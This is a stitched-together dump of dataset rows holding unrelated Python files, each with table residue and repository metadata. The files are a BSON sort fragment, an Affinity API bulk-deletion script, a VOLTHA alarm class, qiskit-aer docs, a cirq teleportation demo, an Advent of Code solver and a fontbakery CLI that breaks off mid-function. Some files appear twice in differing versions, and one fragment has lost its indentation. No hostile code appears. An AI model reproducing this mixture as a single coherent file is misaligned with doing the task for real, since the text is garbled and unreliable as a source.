    """Build a (presence, wrapped value) sort key; missing values sort first."""
    value = resolve_key(key, doc)
    # BUG FIX: the guard on NOTHING was lost, which made the second return
    # unreachable and every document sort as if its key were missing.
    if value is NOTHING:
        return 0, BsonComparable(None)
    return 1, BsonComparable(value)
class BsonComparable(object):
def __init__(self, obj):
self.obj = obj
def __lt__(self, other):
return bson_compare(operator.lt, self.obj, other.obj)
| true | true |
1c305156fe152697d24331502b2aca807f21ccf5 | 2,392 | py | Python | script.py | Aaron1515/affinity-delete-opps | e5aa4daf1d863bd7c872c31277c22872084c41f9 | [
"MIT"
] | null | null | null | script.py | Aaron1515/affinity-delete-opps | e5aa4daf1d863bd7c872c31277c22872084c41f9 | [
"MIT"
] | null | null | null | script.py | Aaron1515/affinity-delete-opps | e5aa4daf1d863bd7c872c31277c22872084c41f9 | [
"MIT"
] | null | null | null | import requests
import csv
from apikeys import *
from opp_ids import *
total_count = len(opp_ids)
current_count = 0
corrected_count = 0
log_file = open("log.csv", "w")
log_file.write("Oppertunity ID, Status code, Note")
log_file.write("\n")
for each in opp_ids:
response = requests.delete("https://api.affinity.co/opportunities/" + str(each), auth=('', api_key))
current_count = current_count + 1
if response.status_code == 200:
corrected_count = corrected_count + 1
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - "+ str(response.json()))
log_file.write(str(each) + ", " + str(response.status_code) + ", " + str(response.json()))
log_file.write("\n")
elif response.status_code == 422:
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - "+ str(response.json()))
log_file.write(str(each) + ", " + str(response.status_code) + ", " + str(response.json()))
log_file.write("\n")
elif response.status_code == 429:
print("Working on " + str(each) + " - 429 error - "+ str(response.json()))
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - API Limit Reached")
log_file.write(str(each) + ", " + str(response.status_code) + ", " + "API Limit Reached")
log_file.write("\n")
break
elif response.status_code == 500:
print("Working on " + str(each) + " - 500 error - Internal Server Error")
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - Internal Server Error")
log_file.write(str(each) + ", " + str(response.status_code) + ", " + "Internal Server Error")
log_file.write("\n")
elif response.status_code == 503:
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - Internal Server Error")
log_file.write(str(each) + ", " + str(response.status_code) + ", " + "Internal Server Error")
log_file.write("\n")
else:
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - "+ str(response.json()))
log_file.write(str(each) + ", " + str(response.status_code) + ", " + response.json()[0])
log_file.write("\n")
log_file.write("\n")
log_file.write("Number of successful oppertunities removed: " + str(corrected_count)+"\n")
log_file.write("Number of entries proccessed: " + str(current_count))
log_file.close() | 46 | 112 | 0.644649 | import requests
import csv
from apikeys import *
from opp_ids import *
total_count = len(opp_ids)
current_count = 0
corrected_count = 0
log_file = open("log.csv", "w")
log_file.write("Oppertunity ID, Status code, Note")
log_file.write("\n")
for each in opp_ids:
response = requests.delete("https://api.affinity.co/opportunities/" + str(each), auth=('', api_key))
current_count = current_count + 1
if response.status_code == 200:
corrected_count = corrected_count + 1
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - "+ str(response.json()))
log_file.write(str(each) + ", " + str(response.status_code) + ", " + str(response.json()))
log_file.write("\n")
elif response.status_code == 422:
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - "+ str(response.json()))
log_file.write(str(each) + ", " + str(response.status_code) + ", " + str(response.json()))
log_file.write("\n")
elif response.status_code == 429:
print("Working on " + str(each) + " - 429 error - "+ str(response.json()))
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - API Limit Reached")
log_file.write(str(each) + ", " + str(response.status_code) + ", " + "API Limit Reached")
log_file.write("\n")
break
elif response.status_code == 500:
print("Working on " + str(each) + " - 500 error - Internal Server Error")
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - Internal Server Error")
log_file.write(str(each) + ", " + str(response.status_code) + ", " + "Internal Server Error")
log_file.write("\n")
elif response.status_code == 503:
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - Internal Server Error")
log_file.write(str(each) + ", " + str(response.status_code) + ", " + "Internal Server Error")
log_file.write("\n")
else:
print(str(current_count) + "/"+ str(total_count) + " Working on " + str(each) + " - "+ str(response.json()))
log_file.write(str(each) + ", " + str(response.status_code) + ", " + response.json()[0])
log_file.write("\n")
log_file.write("\n")
log_file.write("Number of successful oppertunities removed: " + str(corrected_count)+"\n")
log_file.write("Number of entries proccessed: " + str(current_count))
log_file.close() | true | true |
1c30538966065c1eab9a2b56db803daff4678a4c | 1,423 | py | Python | voltha/extensions/alarms/onu/onu_activation_fail_alarm.py | jeffvan-netsia/voltha_doc | 8af3c0e9348142ca07e849db8ce494ce66ea15f6 | [
"Apache-2.0"
] | null | null | null | voltha/extensions/alarms/onu/onu_activation_fail_alarm.py | jeffvan-netsia/voltha_doc | 8af3c0e9348142ca07e849db8ce494ce66ea15f6 | [
"Apache-2.0"
] | 3 | 2021-03-31T18:55:31.000Z | 2022-02-11T03:40:15.000Z | voltha/extensions/alarms/onu/onu_activation_fail_alarm.py | netsia/voltha_doc | 8af3c0e9348142ca07e849db8ce494ce66ea15f6 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017-present Adtran, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from voltha.protos.events_pb2 import AlarmEventType, AlarmEventSeverity, AlarmEventCategory
from voltha.extensions.alarms.adapter_alarms import AlarmBase
class OnuActivationFailAlarm(AlarmBase):
    """Alarm raised when an ONU fails to activate on a PON interface."""

    def __init__(self, alarm_mgr, onu_id, intf_id):
        """
        :param alarm_mgr: alarm manager used to format and raise the alarm
        :param onu_id: (int) identifier of the ONU the alarm refers to
        :param intf_id: (int) PON interface the ONU is attached to
        """
        super(OnuActivationFailAlarm, self).__init__(alarm_mgr, object_type='onu ACTIVATION FAIL',
                                                     alarm='ACTIVATION_FAIL',
                                                     alarm_category=AlarmEventCategory.ONU,
                                                     alarm_type=AlarmEventType.COMMUNICATION,
                                                     alarm_severity=AlarmEventSeverity.MAJOR)
        self._onu_id = onu_id
        self._intf_id = intf_id

    def get_context_data(self):
        """Return the context fields embedded in the raised alarm event."""
        return {'onu-id': self._onu_id,
                'onu-intf-id': self._intf_id}
| 45.903226 | 98 | 0.676037 |
from voltha.protos.events_pb2 import AlarmEventType, AlarmEventSeverity, AlarmEventCategory
from voltha.extensions.alarms.adapter_alarms import AlarmBase
class OnuActivationFailAlarm(AlarmBase):
def __init__(self, alarm_mgr, onu_id, intf_id):
super(OnuActivationFailAlarm, self).__init__(alarm_mgr, object_type='onu ACTIVATION FAIL',
alarm='ACTIVATION_FAIL',
alarm_category=AlarmEventCategory.ONU,
alarm_type=AlarmEventType.COMMUNICATION,
alarm_severity=AlarmEventSeverity.MAJOR)
self._onu_id = onu_id
self._intf_id = intf_id
def get_context_data(self):
return {'onu-id': self._onu_id,
'onu-intf-id': self._intf_id}
| true | true |
1c305399f11dcd40a1d2fdbabac57dd9b11aff29 | 5,483 | py | Python | qiskit/providers/aer/library/__init__.py | jakelishman/qiskit-aer | 7512ecede820e0d2bc7ad7b6704bcf06a861ca3a | [
"Apache-2.0"
] | 1 | 2020-07-14T15:32:04.000Z | 2020-07-14T15:32:04.000Z | qiskit/providers/aer/library/__init__.py | jakelishman/qiskit-aer | 7512ecede820e0d2bc7ad7b6704bcf06a861ca3a | [
"Apache-2.0"
] | null | null | null | qiskit/providers/aer/library/__init__.py | jakelishman/qiskit-aer | 7512ecede820e0d2bc7ad7b6704bcf06a861ca3a | [
"Apache-2.0"
] | null | null | null | # This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
=========================================================
Instruction Library (:mod:`qiskit.providers.aer.library`)
=========================================================
.. currentmodule:: qiskit.providers.aer.library
This library contains custom qiskit :class:`~qiskit.QuantumCircuit`
:class:`~qiskit.circuit.Instruction` subclasses that can be used
with the Aer circuit simulator backends.
Setting a Custom Simulator State
================================
The following instruction classes can be used to set the specific
simulator methods to a custom state. Note that these instructions
are only valid when applied to all qubits in a circuit. Applying
to a subset of qubits will raise an exception during execution.
Instruction Classes
-------------------
.. autosummary::
:toctree: ../stubs/
SetStatevector
SetDensityMatrix
SetStabilizer
SetSuperOp
SetUnitary
SetMatrixProductState
QuantumCircuit Methods
----------------------
The set instructions can also be added to circuits by using the
following ``QuantumCircuit`` methods which are patched when importing Aer.
.. autosummary::
:toctree: ../stubs/
set_statevector
set_density_matrix
set_stabilizer
set_unitary
set_superop
set_matrix_product_state
Saving Simulator Data
=====================
.. note ::
Each save instruction has a default label for accessing from the
circuit result data, however duplicate labels in results will result
in an exception being raised. If you use more than 1 instance of a
specific save instruction you must set a custom label for the
additional instructions.
Simulator State Save Instruction Classes
----------------------------------------
The following instructions can be used to save the state of the simulator
into the returned result object. The :class:`SaveState` instruction will
automatically select the format based on the simulation method (eg.
:class:`SaveStatevector` for statevector method, :class:`SaveDensityMatrix`
for density matrix method etc.).
.. autosummary::
:toctree: ../stubs/
SaveState
SaveStatevector
SaveStatevectorDict
SaveDensityMatrix
SaveMatrixProductState
SaveStabilizer
SaveSuperOp
SaveUnitary
.. note::
The :class:`SaveDensityMatrix` instruction can be used to save the
    reduced density matrix of a subset of qubits for supported simulation
methods, however all other save state instructions must be applied
to all qubits in a run circuit.
Simulator Derived Data Save Instruction Classes
-----------------------------------------------
The following classes can be used to directly save data derived from the
simulator state to the returned result object. One some are compatible
with certain simulation methods.
For convenience the save instructions can be accessed using
custom ``QuantumCircuit`` methods
.. autosummary::
:toctree: ../stubs/
SaveExpectationValue
SaveExpectationValueVariance
SaveProbabilities
SaveProbabilitiesDict
SaveAmplitudes
SaveAmplitudesSquared
.. note ::
When saving pershot data by using the ``pershot=True`` kwarg
in the above instructions, the resulting list may only contain
a single value rather than the number of shots. This
happens when a run circuit supports measurement sampling because
it is either
1. An ideal simulation with all measurements at the end.
2. A noisy simulation using the density matrix method with all
measurements at the end.
In both these cases only a single shot is actually simulated and
measurement samples for all shots are calculated from the final
state.
QuantumCircuit Methods
----------------------
The save instructions can also be added to circuits by using the
following ``QuantumCircuit`` methods which are patched when importing Aer.
.. autosummary::
:toctree: ../stubs/
save_amplitudes
save_amplitudes_squared
save_density_matrix
save_expectation_value
save_expectation_value_variance
save_matrix_product_state
save_probabilities
save_probabilities_dict
save_stabilizer
save_state
save_statevector
save_statevector_dict
save_unitary
Method Compatibility
====================
The following table summarizes which instructions are compatible with
which simulation methods
.. csv-table::
:file: instructions_table.csv
:header-rows: 1
"""
__all__ = [
'SaveAmplitudes',
'SaveAmplitudesSquared',
'SaveDensityMatrix',
'SaveExpectationValue',
'SaveExpectationValueVariance',
'SaveMatrixProductState',
'SaveProbabilities',
'SaveProbabilitiesDict',
'SaveStabilizer',
'SaveState',
'SaveStatevector',
'SaveStatevectorDict',
'SaveSuperOp',
'SaveUnitary',
'SetDensityMatrix',
'SetStabilizer',
'SetStatevector',
'SetSuperOp',
'SetUnitary',
'SetMatrixProductState'
]
from .save_instructions import *
from .set_instructions import *
| 28.409326 | 77 | 0.70983 |
__all__ = [
'SaveAmplitudes',
'SaveAmplitudesSquared',
'SaveDensityMatrix',
'SaveExpectationValue',
'SaveExpectationValueVariance',
'SaveMatrixProductState',
'SaveProbabilities',
'SaveProbabilitiesDict',
'SaveStabilizer',
'SaveState',
'SaveStatevector',
'SaveStatevectorDict',
'SaveSuperOp',
'SaveUnitary',
'SetDensityMatrix',
'SetStabilizer',
'SetStatevector',
'SetSuperOp',
'SetUnitary',
'SetMatrixProductState'
]
from .save_instructions import *
from .set_instructions import *
| true | true |
1c3053e084bf6d1940bc940227a24e8501fcf2aa | 1,223 | py | Python | 02-algorithms/teleportation.py | tai271828/cookbook-cirq | 88ac7b8d1c8d3f433c2961ce226d5a517e80e0c6 | [
"BSD-3-Clause"
] | 2 | 2020-05-17T08:13:45.000Z | 2020-09-23T00:58:17.000Z | 02-algorithms/teleportation.py | tai271828/cookbook-cirq | 88ac7b8d1c8d3f433c2961ce226d5a517e80e0c6 | [
"BSD-3-Clause"
] | null | null | null | 02-algorithms/teleportation.py | tai271828/cookbook-cirq | 88ac7b8d1c8d3f433c2961ce226d5a517e80e0c6 | [
"BSD-3-Clause"
] | null | null | null | import math
import random
import cirq
def main():
    """Build and simulate a three-qubit quantum-teleportation circuit."""
    circuit = cirq.Circuit()
    message, alice, bob = cirq.LineQubit.range(3)

    # Prepare the Bell state of Alice's and Bob's qubits
    # That is, making the entangled state of them
    circuit.append([cirq.H(alice), cirq.CNOT(alice, bob)])

    # Mock up the message state that will be sent by Alice.
    # The identity gate leaves the message in |0>.
    # TODO: mocking in the random way
    circuit.append(cirq.I(message))

    # Bell measurement of the message and Alice's qubit produces the two
    # classical bits Alice would send to Bob.
    circuit.append([cirq.CNOT(message, alice), cirq.H(message)])
    circuit.append(cirq.measure(message))
    circuit.append(cirq.measure(alice))

    # decode the state of the qubit owned by bob
    # (corrections expressed as controlled gates on the post-measurement state)
    circuit.append([cirq.CNOT(alice, bob), cirq.CZ(message, bob)])

    # simulate the circuit
    simulator = cirq.Simulator()
    final_result = simulator.simulate(circuit)
    print(circuit)

    # The final_state should be one of the computation basis
    # |000> + |001> + |010> + |011> +
    # |100> + |101> + |110> + |111>
    #
    # Because the initial state of message is |0> and cirq.I does not change its state,
    # so the final_state should be 1x|000>
    # NOTE(review): `final_state` was renamed `final_state_vector` in newer
    # cirq releases -- confirm the pinned cirq version before upgrading.
    print(final_result.final_state)


if __name__ == '__main__':
    main()
| 29.119048 | 87 | 0.668847 | import math
import random
import cirq
def main():
circuit = cirq.Circuit()
message, alice, bob = cirq.LineQubit.range(3)
circuit.append([cirq.H(alice), cirq.CNOT(alice, bob)])
circuit.append(cirq.I(message))
circuit.append([cirq.CNOT(message, alice), cirq.H(message)])
circuit.append(cirq.measure(message))
circuit.append(cirq.measure(alice))
circuit.append([cirq.CNOT(alice, bob), cirq.CZ(message, bob)])
simulator = cirq.Simulator()
final_result = simulator.simulate(circuit)
print(circuit)
print(final_result.final_state)
if __name__ == '__main__':
main()
| true | true |
1c305481bc660200af684e6b8573b46e7253a6b5 | 2,238 | py | Python | entries/day17/main.py | ZeldaZach/AdventOfCode2021 | 3eefd3dcaeb331457c4fc58866705aa6c6580830 | [
"MIT"
] | 1 | 2022-01-02T11:00:04.000Z | 2022-01-02T11:00:04.000Z | entries/day17/main.py | ZeldaZach/AdventOfCode2021 | 3eefd3dcaeb331457c4fc58866705aa6c6580830 | [
"MIT"
] | null | null | null | entries/day17/main.py | ZeldaZach/AdventOfCode2021 | 3eefd3dcaeb331457c4fc58866705aa6c6580830 | [
"MIT"
] | null | null | null | import pathlib
import re
from typing import List, Union, Tuple
def read_inputs(input_file: str) -> List[int]:
    """Read the puzzle input and return the target-area bounds.

    Returns [x_min, x_max, y_min, y_max] parsed from a line of the form
    ``target area: x=20..30, y=-10..-5``.
    """
    # BUG FIX: escape the dots -- a bare ".." in the pattern matches any two
    # characters, which could accept malformed input.
    area_regex = re.compile(r"target area: x=(-?\d+)\.\.(-?\d+), y=(-?\d+)\.\.(-?\d+)")
    with pathlib.Path(input_file).open() as fp:
        line = fp.readline()
    return list(map(int, area_regex.findall(line)[0]))
def check_if_probe_hits(
    probe_x: int,
    probe_y: int,
    velocity_x: int,
    velocity_y: int,
    target_x_range: List[int],
    target_y_range: List[int],
):
    """Simulate the probe and return (hit, apex).

    *hit* is True when the probe lands inside the target area at the end of
    some step; *apex* is the highest y reached, or -1 on a miss.
    """
    x_limit = max(target_x_range)
    y_limit = min(target_y_range)
    apex = float("-inf")
    while probe_x <= x_limit and probe_y >= y_limit:
        probe_x, probe_y = probe_x + velocity_x, probe_y + velocity_y
        # Drag pulls horizontal speed toward zero; gravity always applies.
        if velocity_x > 0:
            velocity_x -= 1
        elif velocity_x < 0:
            velocity_x += 1
        velocity_y -= 1
        if probe_y > apex:
            apex = probe_y
        if probe_x in target_x_range and probe_y in target_y_range:
            return True, apex
    return False, -1
def anal_the_probes(
target_min_x: int, target_max_x: int, target_min_y: int, target_max_y: int
) -> Tuple[int, int]:
valid_target_x = list(range(target_min_x, target_max_x + 1))
valid_target_y = list(range(target_min_y, target_max_y + 1))
valid_velocities = []
max_height_of_valid_probe = float("-inf")
for probe_x in range(1, max(valid_target_x)):
for probe_y in range(min(valid_target_y), 100):
does_hit_target, max_height = check_if_probe_hits(
0, 0, probe_x, probe_y, valid_target_x, valid_target_y
)
if does_hit_target:
max_height_of_valid_probe = max(max_height_of_valid_probe, max_height)
valid_velocities.append((probe_x, probe_y))
return max_height_of_valid_probe, len(valid_velocities)
def part1() -> int:
    """Answer for part 1: the best achievable apex height."""
    bounds = read_inputs("input.txt")
    return anal_the_probes(*bounds)[0]
def part2() -> int:
    """Answer for part 2: the number of distinct hitting velocities."""
    bounds = read_inputs("input.txt")
    return anal_the_probes(*bounds)[1]
def main() -> None:
    """Entry point: print the answer to each puzzle part in order."""
    for solver in (part1, part2):
        print(solver())


if __name__ == "__main__":
    main()
| 27.975 | 86 | 0.652368 | import pathlib
import re
from typing import List, Union, Tuple
def read_inputs(input_file: str) -> List[int]:
    """Parse the puzzle input and return ``[x_min, x_max, y_min, y_max]``.

    The input is a single line of the form
    ``target area: x=20..30, y=-10..-5``.
    """
    with pathlib.Path(input_file).open() as fp:
        line = fp.readline()
    # Escape the dots: a bare ``..`` is "any two characters" in a regex and
    # would also match malformed separators.
    area_regex = re.compile(
        r"target area: x=(-?\d+)\.\.(-?\d+), y=(-?\d+)\.\.(-?\d+)"
    )
    return list(map(int, area_regex.findall(line)[0]))
def check_if_probe_hits(
    probe_x: int,
    probe_y: int,
    velocity_x: int,
    velocity_y: int,
    target_x_range: List[int],
    target_y_range: List[int],
):
    """Simulate one probe launch step by step.

    Returns ``(True, max_height)`` if the probe ever lands exactly on a
    target cell, ``(False, -1)`` otherwise.
    """
    # Sets give O(1) membership checks inside the simulation loop.
    target_x = set(target_x_range)
    target_y = set(target_y_range)
    max_x_target = max(target_x_range)
    min_y_target = min(target_y_range)
    max_probe_y = float("-inf")
    # Past the right edge or below the bottom edge the probe can never
    # return, so the simulation may stop.
    while probe_x <= max_x_target and probe_y >= min_y_target:
        probe_x += velocity_x
        probe_y += velocity_y
        # Drag: x velocity decays toward zero, one unit per step.
        velocity_x += -1 if velocity_x > 0 else (1 if velocity_x else 0)
        # Gravity: y velocity drops by one each step.
        velocity_y -= 1
        max_probe_y = max(max_probe_y, probe_y)
        if probe_x in target_x and probe_y in target_y:
            return True, max_probe_y
    return False, -1


def anal_the_probes(
    target_min_x: int, target_max_x: int, target_min_y: int, target_max_y: int
) -> Tuple[int, int]:
    """Scan every plausible launch velocity against the target rectangle.

    Returns ``(best_height, hit_count)``.
    """
    valid_target_x = list(range(target_min_x, target_max_x + 1))
    valid_target_y = list(range(target_min_y, target_max_y + 1))
    valid_velocities = []
    max_height_of_valid_probe = float("-inf")
    # Bug fix: a probe fired with vx == target_max_x lands on the far edge
    # after a single step, so the upper bound must be inclusive; the old
    # exclusive ``range(1, max_x)`` silently dropped those solutions.
    # The vertical bound replaces the old hard-coded 100: any |vy| beyond
    # the target's largest |y| steps over the target area entirely.
    vy_upper = max(abs(target_min_y), abs(target_max_y)) + 1
    for probe_x in range(1, target_max_x + 1):
        for probe_y in range(target_min_y, vy_upper):
            does_hit_target, max_height = check_if_probe_hits(
                0, 0, probe_x, probe_y, valid_target_x, valid_target_y
            )
            if does_hit_target:
                max_height_of_valid_probe = max(
                    max_height_of_valid_probe, max_height
                )
                valid_velocities.append((probe_x, probe_y))
    return max_height_of_valid_probe, len(valid_velocities)
def part1() -> int:
    """Answer for part 1: the best achievable apex height."""
    bounds = read_inputs("input.txt")
    return anal_the_probes(*bounds)[0]
def part2() -> int:
    """Answer for part 2: the number of distinct hitting velocities."""
    bounds = read_inputs("input.txt")
    return anal_the_probes(*bounds)[1]
def main() -> None:
    """Entry point: print the answer to each puzzle part in order."""
    for solver in (part1, part2):
        print(solver())


if __name__ == "__main__":
    main()
| true | true |
1c3054edcb87c40ad2dd5603ddd25890bebe93c2 | 11,856 | py | Python | Lib/fontbakery/commands/check_specification.py | Bhanditz/fontbakery | 683fcf3a69a8c0dde805a9e93cd54693c0fad590 | [
"Apache-2.0"
] | null | null | null | Lib/fontbakery/commands/check_specification.py | Bhanditz/fontbakery | 683fcf3a69a8c0dde805a9e93cd54693c0fad590 | [
"Apache-2.0"
] | null | null | null | Lib/fontbakery/commands/check_specification.py | Bhanditz/fontbakery | 683fcf3a69a8c0dde805a9e93cd54693c0fad590 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# usage:
# $ fontbakery check-specification fontbakery.specifications.googlefonts -h
import argparse
import importlib.util
import os
import sys
from collections import OrderedDict
from fontbakery.checkrunner import (
distribute_generator
, CheckRunner
, ValueValidationError
, Spec
, get_module_specification
, DEBUG
, INFO
, WARN
, ERROR
, SKIP
, PASS
, FAIL
, STARTSECTION
, ENDSECTION
)
log_levels = OrderedDict((s.name,s) for s in sorted((
DEBUG
, INFO
, WARN
, ERROR
, SKIP
, PASS
, FAIL
)))
DEFAULT_LOG_LEVEL = WARN
from fontbakery.reporters.terminal import TerminalReporter
from fontbakery.reporters.serialize import SerializeReporter
from fontbakery.reporters.ghmarkdown import GHMarkdownReporter
from fontbakery.reporters.html import HTMLReporter
def ArgumentParser(specification, spec_arg=True):
    """Create the fontbakery command line argument parser.

    Parameters
    ----------
    specification
        The specification object; its ``setup_argparse`` hook may register
        spec-specific arguments and its ``iterargs`` feed the
        ``--gather-by`` choices.
    spec_arg : bool
        When True, add the positional ``specification`` argument (used by
        the generic check-specification command).

    Returns
    -------
    tuple
        ``(argument_parser, values_keys)`` where ``values_keys`` lists the
        custom value names registered by ``specification.setup_argparse``.
    """
    argument_parser = argparse.ArgumentParser(
        description="Check TTF files against a specification.",
        formatter_class=argparse.RawTextHelpFormatter)

    if spec_arg:
        argument_parser.add_argument(
            'specification',
            help='File/Module name, must define a fontbakery "specification".')

    values_keys = specification.setup_argparse(argument_parser)

    argument_parser.add_argument(
        "-c",
        "--checkid",
        action="append",
        help=(
            "Explicit check-ids (or parts of their name) to be executed. "
            "Use this option multiple times to select multiple checks."
        ),
    )

    argument_parser.add_argument(
        "-x",
        "--exclude-checkid",
        action="append",
        help=(
            "Exclude check-ids (or parts of their name) from execution. "
            "Use this option multiple times to exclude multiple checks."
        ),
    )

    def log_levels_get(key):
        # argparse ``type=`` callable: map a status name to its Status object.
        if key in log_levels:
            return log_levels[key]
        raise argparse.ArgumentTypeError('Key "{}" must be one of: {}.'.format(
            key, ', '.join(log_levels.keys())))

    argument_parser.add_argument('-v', '--verbose', dest='loglevels', const=PASS,
                                 action='append_const',
                                 help='Shortcut for `-l PASS`.\n')

    argument_parser.add_argument('-l', '--loglevel', dest='loglevels',
                                 type=log_levels_get,
                                 action='append',
                                 metavar='LOGLEVEL',
                                 help='Report checks with a result of this status or higher.\n'
                                      'One of: {}.\n'
                                      '(default: {})'.format(
                                          ', '.join(log_levels.keys()),
                                          DEFAULT_LOG_LEVEL.name))

    argument_parser.add_argument('-m', '--loglevel-messages', default=None,
                                 type=log_levels_get,
                                 help=('Report log messages of this status or higher.\n'
                                       'Messages are all status lines within a check.\n'
                                       'One of: {}.\n'
                                       '(default: LOGLEVEL)'
                                       ).format(', '.join(log_levels.keys())))

    # These two are rendered with terminal escape codes, which the default
    # Windows terminal cannot display; main() forces them off on win32.
    if sys.platform != "win32":
        argument_parser.add_argument(
            '-n',
            '--no-progress',
            action='store_true',
            help='In a tty as stdout, don\'t render the progress indicators.')

        argument_parser.add_argument(
            '-C',
            '--no-colors',
            action='store_true',
            help='No colors for tty output.')

    argument_parser.add_argument('-S', '--show-sections', default=False,
                                 action='store_true',
                                 help='Show section start and end info plus summary.')

    argument_parser.add_argument('-L', '--list-checks', default=False,
                                 action='store_true',
                                 help='List the checks available in the selected specification.')

    argument_parser.add_argument('--json', default=False, type=argparse.FileType('w'),
                                 metavar='JSON_FILE',
                                 help='Write a json formatted report to JSON_FILE.')

    argument_parser.add_argument('--ghmarkdown', default=False, type=argparse.FileType('w'),
                                 metavar='MD_FILE',
                                 help='Write a GitHub-Markdown formatted report to MD_FILE.')

    argument_parser.add_argument('--html', default=False,
                                 type=argparse.FileType('w', encoding="utf-8"),
                                 metavar='HTML_FILE',
                                 help='Write a HTML report to HTML_FILE.')

    iterargs = sorted(specification.iterargs.keys())

    gather_by_choices = iterargs + ['*check']
    argument_parser.add_argument('-g', '--gather-by', default=None,
                                 metavar='ITERATED_ARG',
                                 choices=gather_by_choices,
                                 type=str,
                                 help='Optional: collect results by ITERATED_ARG\n'
                                      'In terminal output: create a summary counter for each ITERATED_ARG.\n'
                                      'In json output: structure the document by ITERATED_ARG.\n'
                                      'One of: {}'.format(', '.join(gather_by_choices))
                                 )

    def parse_order(arg):
        # Bug fix: the old ``filter(...)`` object is always truthy (even when
        # it would yield nothing) and can only be iterated once, so
        # ``order or None`` never returned None and consumers received a
        # lazy single-use iterator instead of a list.
        order = [n.strip() for n in arg.split(',') if n.strip()]
        return order or None

    argument_parser.add_argument('-o', '--order', default=None, type=parse_order,
                                 help='Comma separated list of order arguments.\n'
                                      'The execution order is determined by the order of the check\n'
                                      'definitions and by the order of the iterable arguments.\n'
                                      'A section defines its own order. `--order` can be used to\n'
                                      'override the order of *all* sections.\n'
                                      'Despite the ITERATED_ARGS there are two special\n'
                                      'values available:\n'
                                      '"*iterargs" -- all remainig ITERATED_ARGS\n'
                                      '"*check" -- order by check\n'
                                      'ITERATED_ARGS: {}\n'
                                      'A sections default is equivalent to: "*iterargs, *check".\n'
                                      'A common use case is `-o "*check"` when checking the whole \n'
                                      'collection against a selection of checks picked with `--checkid`.'
                                      ''.format(', '.join(iterargs))
                                 )
    return argument_parser, values_keys
class ArgumentParserError(Exception):
    """Raised by ThrowingArgumentParser in place of argparse's sys.exit()."""
class ThrowingArgumentParser(argparse.ArgumentParser):
    """ArgumentParser variant that raises instead of exiting on bad input."""

    def error(self, message):
        # argparse's default error() prints usage and calls sys.exit();
        # raising lets callers recover (see get_spec).
        raise ArgumentParserError(message)
def get_module_from_file(filename):
    """Import a python file from an arbitrary path and return the module.

    e.g. ``my/path/to/file.py`` is loaded under the synthetic module name
    ``file_module.file_py``.
    """
    basename = os.path.basename(filename).replace('.', '_')
    module_name = 'file_module.{}'.format(basename)
    module_spec = importlib.util.spec_from_file_location(module_name, filename)
    loaded = importlib.util.module_from_spec(module_spec)
    module_spec.loader.exec_module(loaded)
    return loaded
def get_module(name):
    """Resolve *name* to a module.

    A file that exists on disk is loaded from its path; otherwise *name*
    is imported as a regular dotted module name.
    """
    if not os.path.isfile(name):
        from importlib import import_module
        # Fails with an appropriate ImportError for unknown modules.
        return import_module(name, package=None)
    # An existing file wins over an importable module of the same name.
    return get_module_from_file(name)
def get_spec():
    """Prefetch the specification module, to fill some holes in the help text."""
    # Minimal throwaway parser: only the positional ``specification``
    # argument is needed before the real parser (which depends on the spec
    # itself) can be built. parse_known_args reads sys.argv.
    argument_parser = ThrowingArgumentParser(add_help=False)
    argument_parser.add_argument('specification')
    try:
        args, _ = argument_parser.parse_known_args()
    except ArgumentParserError:
        # silently fails, the main parser will show usage string.
        return Spec()
    imported = get_module(args.specification)
    specification = get_module_specification(imported)
    if not specification:
        raise Exception(f"Can't get a specification from {imported}.")
    return specification
# This alias is kept for backwards compatibility (e.g. check-commands,
# FontBakery Dashboard). The function of the same name previously only
# passed all of its parameters on to CheckRunner.
runner_factory = CheckRunner
def main(specification=None, values=None):
    """Run the given (or CLI-selected) specification and report the results.

    Returns the process exit code: 1 if the worst check status was ERROR or
    FAIL, 0 otherwise.
    """
    # specification can be injected, e.g. check-googlefonts injects its own
    # spec; only the generic command needs the positional spec argument.
    add_spec_arg = False
    if specification is None:
        specification = get_spec()
        add_spec_arg = True

    argument_parser, values_keys = ArgumentParser(specification, spec_arg=add_spec_arg)
    args = argument_parser.parse_args()

    if args.list_checks:
        # Print the available checks grouped by section, then stop.
        print('Available checks')
        for section_name, section in specification._sections.items():
            checks = section.list_checks()
            message = "# {}:\n {}".format(section_name,"\n ".join(checks))
            print(message)
        sys.exit()

    values_ = {}
    if values is not None:
        values_.update(values)

    # values_keys are returned by specification.setup_argparse;
    # these are keys for custom arguments required by the spec.
    if values_keys:
        for key in values_keys:
            if hasattr(args, key):
                values_[key] = getattr(args, key)

    try:
        runner = CheckRunner(specification
                             , values=values_
                             , custom_order=args.order
                             , explicit_checks=args.checkid
                             , exclude_checks=args.exclude_checkid
                             )
    except ValueValidationError as e:
        # Bad input values: show the problem and the usage string, then exit.
        print(e)
        argument_parser.print_usage()
        sys.exit(1)

    # The default Windows Terminal just displays the escape codes. The argument
    # parser above therefore has these options disabled.
    if sys.platform == "win32":
        args.no_progress = True
        args.no_colors = True

    # the most verbose loglevel wins
    loglevel = min(args.loglevels) if args.loglevels else DEFAULT_LOG_LEVEL
